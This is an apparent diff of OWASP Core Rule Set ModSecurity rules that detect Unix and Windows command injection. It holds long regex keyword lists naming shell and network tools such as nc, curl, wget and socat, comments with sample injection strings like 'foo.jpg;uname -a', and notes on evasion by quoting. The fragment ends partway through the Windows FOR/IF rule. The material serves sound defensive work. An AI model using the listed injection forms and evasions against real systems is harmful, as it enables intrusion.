Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ Unix command injection ] +# +# This rule detects Unix command injections. +# A command injection takes a form such as: +# +# foo.jpg;uname -a +# foo.jpg||uname -a +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in shell syntax, such as: ; | & $( ` <( >( +# Anatomy of the regexp with examples of patterns caught: +# +# 1. Starting tokens +# +# ; ;ifconfig +# \{ {ifconfig} +# \| |ifconfig +# \|\| ||ifconfig +# & &ifconfig +# && &&ifconfig +# \n ;\nifconfig +# \r ;\rifconfig +# \$\( $(ifconfig) +# \$\(\( $((ifconfig)) +# ` `ifconfig` +# \${ ${ifconfig} +# <\( <( ifconfig ) +# >\( >( ifconfig ) +# \(\s*\) a() ( ifconfig; ); a +# +# 2. Command prefixes +# +# { { ifconfig } +# \s*\(\s* ( ifconfig ) +# \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ VARNAME=xyz ifconfig +# !\s* ! ifconfig +# \$ $ifconfig +# +# 3. Quoting +# +# ' 'ifconfig' +# \" "ifconfig" +# +# 4. Paths +# +# [\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. +# +# An effort was made to combat evasions by shell quoting (e.g. 'ls', +# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine +# transformation built-in to deal with this, but unfortunately, it +# replaces ';' characters and lowercases the payload, which is less +# useful for this case. However, emulating the transformation makes +# the regexp more complex. +# +# This is the base Rule to prevent Unix Command Injection +# for prefix + two and three characters. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932230.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:4|[\s\v&\),<>\|].*))|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)\b" \ + "id:932230,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (2-3 chars)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This is the base Rule to prevent Unix Command Injection +# for prefix + more than 4 characters. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932235.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932235 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\v&\)<>\|]|a(?:dd(?:group|user)|getty|l(?:ias|pine)[\s\v&\)<>\|]|nsible-playbook|pt(?:-get|itude[\s\v&\)<>\|])|r(?:ch[\s\v&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm|xel)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\v&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v&\)<>\|]|on(?:tab)?)|s(?:plit|vtool)|u(?:psfilter|rl[\s\v&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\v&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\v&\)<>\|]|grep|i(?:le(?:[\s\v&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\v&\)<>\|])|o(?:ld[\s\v&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\v&\)<>\|]|core|e(?:ni(?:e[\s\v&\)<>\|]|soimage)|tfacl[\s\v&\)<>\|])|hci|i(?:mp[\s\v&\)<>\|]|nsh)|r(?:ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|dconfig|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ke[\s\v&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\v&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\v&\)<>\|]|map|o(?:de[\s\v&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\v&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\v&\)<>\|]|shd)|wd\.db|ython[^\s\v])|r(?:ak(?:e[\s\v&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\v&\)<>\|]|user)|nano|oute[\s\v&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap)[\s\v&\)<>\|]|c(?:hed|r(?:een|ipt)[\s\v&\)<>\|])|diff|e(?:(?:lf|rvice)[\s\v&\)<>\|]|ndmail|t(?:arch|env|facl[\s\v&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\v&\)<>\|]|u(?:f|tdown[\s\v&\)<>\|]))|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:(?:out)?[\s\v&\)<>\|]|datectl)|mux|ouch[\s\v&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v&\)<>\|]|gr|mdiff|pw|rsh)|olatility[\s\v&\)<>\|])|w(?:a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ + "id:932235,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows PowerShell, cmdlets and options ] +# +# Detect some common PowerShell commands, cmdlets and options. +# These commands should be relatively uncommon in normal text, but +# potentially useful for code injection. +# +# If you are not running Windows, it is safe to disable this rule. +# +# https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ff714569(v=msdn.10) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ + "id:932120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Windows PowerShell Command Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'language-powershell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows Powershell cmdlet aliases ] +# +# Attempts to detect aliases of the common PowerShell cmdlets in windows-powershell-commands.data +# If you are not running Windows, it is safe to disable this rule. +# +# There are other aliases which are similar to Unix, but they are properly handled by rule 932105 +# +# Regular expression generated from regex-assembly/932125.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932125 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:a[\"\^]*n|[dipv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\v,\.-/;-<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\v,\.-/;-<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\v,\.-/;-<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\v,\.-/;-<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[u-v])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\v,\.-/;-<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\v,\.-/;-<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\v,\.-/;-<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\v,\.-/;-<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\v,\.-/;-<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[civ]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\v,\.-/;-<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932125,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Powershell Alias Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell expressions ] +# +# Detects the following patterns which are common in Unix shell scripts +# and one-liners: +# +# $(foo) Command substitution +# ${foo} Parameter expansion +# <(foo) Process substitution +# >(foo) Process substitution +# $((foo)) Arithmetic expansion +# /e[t]c Shell glob expression to bypass wordlists +# +# Regular expression generated from regex-assembly/932130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932130 +# +# This rule has a stricter sibling: 932131 (PL2) that applies the same regex to User-Agent and Referer +# +# This rule is essential to defend against the Log4J / Log4Shell attacks (see also rule 944150) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ + "id:932130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows FOR, IF commands ] +# +# This rule detects Windows command shell FOR and IF commands. +# If you are not running Windows, it is safe to disable this rule. +# +# Examples: +# +# FOR %a IN (set) DO +# FOR /D %a IN (dirs) DO +# FOR /F "options" %a IN (text|"text") DO +# FOR /L %a IN (start,step,end) DO +# FOR /R C:\dir %A IN (set) DO +# +# IF [/I] [NOT] EXIST filename | DEFINED 